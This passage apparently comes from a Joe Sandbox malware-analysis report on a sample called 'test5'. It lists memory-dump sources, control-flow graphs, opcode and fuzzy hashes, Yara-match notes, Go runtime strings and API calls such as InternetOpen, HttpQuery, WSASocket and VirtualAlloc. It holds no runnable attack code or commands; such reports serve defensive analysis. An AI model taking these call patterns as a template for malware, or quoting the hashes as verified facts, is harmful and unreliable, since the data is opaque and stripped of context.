                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incor
                      • API String ID: 0-1712010102
                      • Opcode ID: 113168dd8cd0838c899b54594bdc680877db052c543a6199ab5d6652d01ec4e0
                      • Instruction ID: 7e8e401279b9000d5d9bd4a37da78590491a1e5423e6be14c9777637014ce9b0
                      • Opcode Fuzzy Hash: 113168dd8cd0838c899b54594bdc680877db052c543a6199ab5d6652d01ec4e0
                      • Instruction Fuzzy Hash: 57B12932209B918ADF50DB25E4913AEB77AF785B54F044129EB8D03BA9DF3CCA44CB10
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: @Mj
                      • API String ID: 0-1735126492
                      • Opcode ID: 6d7ab3d25694823016ed439db971acd1afc71fe8623d7819c2a543afe797e61e
                      • Instruction ID: e6dd1970f94df5a2569bd3c228350848a98e2834ef8982cea86db711a722b8fd
                      • Opcode Fuzzy Hash: 6d7ab3d25694823016ed439db971acd1afc71fe8623d7819c2a543afe797e61e
                      • Instruction Fuzzy Hash: BC41957A304B8691DF84DB19E8813EA2752E385BC0F85D036EE4F47B69DE38C55AC741
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3c1b710aa581105ce077470ed4dd5055f969c97f0eed0fd2d3014acd7a84847d
                      • Instruction ID: 6810348ad0603b0912026afa46d6cfdb1eec22faf3e0d5705a4ff7b71cfe1d08
                      • Opcode Fuzzy Hash: 3c1b710aa581105ce077470ed4dd5055f969c97f0eed0fd2d3014acd7a84847d
                      • Instruction Fuzzy Hash: 59C1C572209B4486EB00DF65F8A177AB762F786780F54512EEA8D8776ADF7CC841CB04
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ef146861610d32b6a974d0ff372a88f2021a393453dade5270ad56bce7b767dc
                      • Instruction ID: 90eee97b3c4b895f754d9ef6cc4b1c5bda5fe47b1ae0aa322d97387591e4b6c6
                      • Opcode Fuzzy Hash: ef146861610d32b6a974d0ff372a88f2021a393453dade5270ad56bce7b767dc
                      • Instruction Fuzzy Hash: B991C5F1A05B008ADB129F16E8903F97763F786B85F599139DA4C0B326EB39C8C6C744
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a97ce655f4e0cac6955700c642791870ea1a8c4fea0e8b3dbafc5627d03b9b52
                      • Instruction ID: d77bcb952ce203ffa491510052ac3aaa823b3f3c5ab2b5ecc7373c01aebe8e27
                      • Opcode Fuzzy Hash: a97ce655f4e0cac6955700c642791870ea1a8c4fea0e8b3dbafc5627d03b9b52
                      • Instruction Fuzzy Hash: E1215132708B85D2CB50CB25F4513AAB765F346BD4F549225EEAD87BA9DB39C1C1CB00

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _snprintf$Internet$AvailableCloseDataHandleHttpOpenQueryRequest_errno_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 1006711554-0
                      • Opcode ID: 2eb0edb0e8600735d118a9a3102a95e924e1697cd069f818d03d23b98a2022eb
                      • Instruction ID: 08612f5048bc2ba034bad5130c01802f556816d42292c75c545ba6ac0078f89e
                      • Opcode Fuzzy Hash: 2eb0edb0e8600735d118a9a3102a95e924e1697cd069f818d03d23b98a2022eb
                      • Instruction Fuzzy Hash: 3771D53061CA189BEB54EF28D8897FE77E6FBE8311F40056DE44AC3191EE35E9418B81

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1084 21551bfca74-21551bfcba2 call 21551c0473c call 21551c0489c * 2 call 21551c09a24 call 21551c09a34 * 2 call 21551c09a04 * 2 call 21551c09a24 * 2 call 21551c0d1c8 call 21551c09a04 * 3 call 21551c09a34 call 21551c0a728 call 21551c0ca38 * 2 call 21551bfeff8 1123 21551bfcba9-21551bfcbbe call 21551c09a04 call 21551bfee1c 1084->1123 1124 21551bfcba4 call 21551c0ba2c 1084->1124 1130 21551bfcbc5-21551bfcbd3 call 21551bfee30 1123->1130 1131 21551bfcbc0 call 21551c0ba2c 1123->1131 1124->1123 1135 21551bfcbd5 call 21551c0ba2c 1130->1135 1136 21551bfcbda-21551bfcbe1 call 21551bfeeac 1130->1136 1131->1130 1135->1136 1140 21551bfcbe8-21551bfcc1b call 21551c09a34 call 21551c09a04 call 21551c0d1c8 1136->1140 1141 21551bfcbe3 call 21551c0ba2c 1136->1141 1149 21551bfcc1d call 21551c0ba2c 1140->1149 1150 21551bfcc22-21551bfcc56 call 21551c09a04 call 21551c0ca38 call 21551c09a04 call 21551c043b0 1140->1150 1141->1140 1149->1150 1160 21551bfce48-21551bfce6c call 21551c0d188 call 21551c0ba2c 1150->1160 1161 21551bfcc5c-21551bfcc69 1150->1161 1163 21551bfcc6d-21551bfcd10 call 21551c0a328 call 21551c0d57c call 21551c0a328 call 21551c0d57c * 2 call 21551bfe724 call 21551c09a04 call 21551bfe6d0 1161->1163 1183 21551bfcd12-21551bfcd20 call 21551c09314 1163->1183 1184 21551bfcd34-21551bfcd37 1163->1184 1192 21551bfcd2e-21551bfcd31 1183->1192 1193 21551bfcd22-21551bfcd2c call 21551c073f8 1183->1193 1185 21551bfcdb7 1184->1185 1186 21551bfcd39-21551bfcd5c call 21551c05220 call 21551c09a04 1184->1186 1188 21551bfcdbc-21551bfcdc8 call 21551bfe6a4 call 21551bfeff8 1185->1188 1202 21551bfcd5e 1186->1202 1203 21551bfcd63-21551bfcd84 call 21551c00bbc call 21551c03894 call 21551c03314 call 21551bfeff8 1186->1203 1204 21551bfcdca call 21551c0ba2c 1188->1204 1205 21551bfcdcf-21551bfcdef call 21551c0a26c 1188->1205 1192->1184 1193->1184 1202->1203 1231 21551bfcd86-21551bfcd89 call 21551bff0bc 1203->1231 1232 21551bfcd8e-21551bfcd95 1203->1232 1204->1205 1213 21551bfcdf6-21551bfcdfe 1205->1213 1214 21551bfcdf1 call 21551c0ba2c 1205->1214 1213->1160 1217 21551bfce00-21551bfce08 1213->1217 1214->1213 1219 21551bfce36 call 21551c01414 1217->1219 1220 21551bfce0a-21551bfce1b 1217->1220 1228 21551bfce3b-21551bfce42 1219->1228 1223 21551bfce1d-21551bfce2c call 21551bfefd8 1220->1223 1224 21551bfce2e 1220->1224 1226 21551bfce30-21551bfce32 1223->1226 1224->1226 1226->1219 1230 21551bfce34 1226->1230 1228->1160 1228->1163 1230->1219 1231->1232 1232->1188 1234 21551bfcd97-21551bfcdb5 call 21551bfe6a4 call 21551bfe724 call 21551bfe8d8 1232->1234 1234->1188
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
                      • String ID:
                      • API String ID: 2667508507-0
                      • Opcode ID: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
                      • Instruction ID: d74f784cda792ebde45bfbd33b5616fc8a5b46a915be889b7f3feb6170d5a64b
                      • Opcode Fuzzy Hash: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
                      • Instruction Fuzzy Hash: 2DC1B630214E24ABEB54FB74C4CA7FD7AD3EBE8310F8044ADA549C72D3EE25E9458A41

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1365 21551bfec4c-21551bfec87 call 21551bfed50 WSASocketA 1368 21551bfec89-21551bfec8b 1365->1368 1369 21551bfec90-21551bfeccf WSAIoctl 1365->1369 1370 21551bfed2e-21551bfed42 1368->1370 1371 21551bfecec-21551bfecf6 1369->1371 1372 21551bfecd1-21551bfece9 1369->1372 1373 21551bfecf8-21551bfecf9 1371->1373 1374 21551bfed23-21551bfed2c 1371->1374 1372->1371 1375 21551bfecfd-21551bfed07 1373->1375 1374->1370 1377 21551bfed09-21551bfed0c 1375->1377 1378 21551bfed0e-21551bfed1a 1375->1378 1377->1378 1379 21551bfed1e-21551bfed1f 1377->1379 1378->1374 1380 21551bfed1c 1378->1380 1379->1374 1380->1375
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: IoctlSocket
                      • String ID: _Cy
                      • API String ID: 1409745359-1085951347
                      • Opcode ID: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
                      • Instruction ID: df1deff95c86ab7aa00d471e0c0ac2999ea2843c644e19bbef680b402b2e1c69
                      • Opcode Fuzzy Hash: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
                      • Instruction Fuzzy Hash: 5331B43461CE588BD754DF2C98C87BABBD2FBE8325F51166EE88AC3191DB31C4818741

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551b00000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetLibraryLoadOpen
                      • String ID: wini
                      • API String ID: 2559873147-1606035523
                      • Opcode ID: 1105e58a2544bfd005ad153f036402a995691c8f86edb9c2bbaca55425401acd
                      • Instruction ID: 938efce4ccb2bb453d4982f71750fc6a0bbaf189b78069c0c02988de63905332
                      • Opcode Fuzzy Hash: 1105e58a2544bfd005ad153f036402a995691c8f86edb9c2bbaca55425401acd
                      • Instruction Fuzzy Hash: E8F0557111D928A7E31D2E32580F3BA3AC6E7A2719F1591EFF183C24D2E9209C4280A3
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551b00000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocFileInternetReadVirtual
                      • String ID:
                      • API String ID: 3591508208-0
                      • Opcode ID: 6b60ce9cb4e923b11b8257dbe61bc90d4fe4aa8c819b1d86596d13da368f0b41
                      • Instruction ID: 2a29278c4ea0c5ff893ab067093d328f58c6ec02383b9d29fffcfac46b7aadee
                      • Opcode Fuzzy Hash: 6b60ce9cb4e923b11b8257dbe61bc90d4fe4aa8c819b1d86596d13da368f0b41
                      • Instruction Fuzzy Hash: AF21C03120884A1BE7168AA4E8923AB33D6DBA8354F34845DF45EC73C3DA28CC53C396
                      APIs
                      • EnumCalendarInfoExW.KERNELBASE ref: 006F21E7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID: CalendarEnumInfo
                      • String ID:
                      • API String ID: 2925833060-0
                      • Opcode ID: 2525a88f381b6b1ecfbfb687c266decb66c4fc36e0a9b82aa819b4781aa7c3de
                      • Instruction ID: cbde714a72bf50e094a220dc4e3e2a41d972f0a177013d8a09611fce45b144d1
                      • Opcode Fuzzy Hash: 2525a88f381b6b1ecfbfb687c266decb66c4fc36e0a9b82aa819b4781aa7c3de
                      • Instruction Fuzzy Hash: E3119136A00F85C1DB25DB1AE8613797371F748BE4F244226CFAD57BA4CB29E592CB04
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                      • Instruction ID: d7734f9e29522b1c94f3834d7ef67b592fc59952bfb38ff70c6dc34e55ac2150
                      • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                      • Instruction Fuzzy Hash: 40419870618B899FD794DB2CC48CB2AB7E2FBA8355F4009ADF489C7360D734D9818B42
                      Strings
                      • .n, xrefs: 00694B96
                      • `1n, xrefs: 0069527B
                      • /memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinner: argument is nilcasgstatus: bad incoming valuesresetspinning: not a spinning mruntime: profBuf already closedruntime: spl, xrefs: 00694E2C
                      • /n, xrefs: 00694C4E
                      • /memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: incons, xrefs: 00694EFE
                      • /n, xrefs: 00694DF6
                      • /gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] =, xrefs: 006948AE
                      • /sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default-behavior/bcryptprimitives.dll not foundpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer foun, xrefs: 00695550
                      • /memory/classes/metadata/mspan/free:bytesruntime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to a, xrefs: 006950FC
                      • @1n, xrefs: 0069521A
                      • @/n, xrefs: 00694CB5
                      • 1n, xrefs: 0069518B
                      • /gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not, xrefs: 00694B1E
                      • /gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep, xrefs: 00694915
                      • /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:, xrefs: 006951EC
                      • /memory/classes/other:bytes/memory/classes/total:bytesfailed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupte, xrefs: 006952AE
                      • /gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedpanic during preemptoffnanotime returning zerofatal: , xrefs: 0069497E
                      • /gc/gogc:percent, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 00694BB0
                      • @0n, xrefs: 00694EC8
                      • *n, xrefs: 006948DF
                      • /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead: no p for timercheckdead:, xrefs: 006953EB
                      • /gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks failedstack not a power of 2minpc or maxpc inv, xrefs: 00694AB5
                      • /gc/pauses:seconds because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime., xrefs: 00694D82
                      • /memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResumeNotification, xrefs: 0069530F
                      • `/n, xrefs: 00694D1C
                      • `0n, xrefs: 00694F2F
                      • 2n, xrefs: 00695461
                      • 0n, xrefs: 006950C9
                      • /gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavaila, xrefs: 00694C84
                      • /gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignalruntime:, xrefs: 006949E7
                      • @3n, xrefs: 00695581
                      • /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old, xrefs: 00694D36
                      • /gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase error, xrefs: 006947DE
                      • /memory/classes/metadata/mcache/free:bytes/memory/classes/metadata/mspan/inuse:bytesnon-empty mark queue after concurrent marksweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal er, xrefs: 00695035
                      • /memory/classes/metadata/mcache/inuse:bytesruntime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundro, xrefs: 0069509B
                      • /memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning wit, xrefs: 00694E93
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
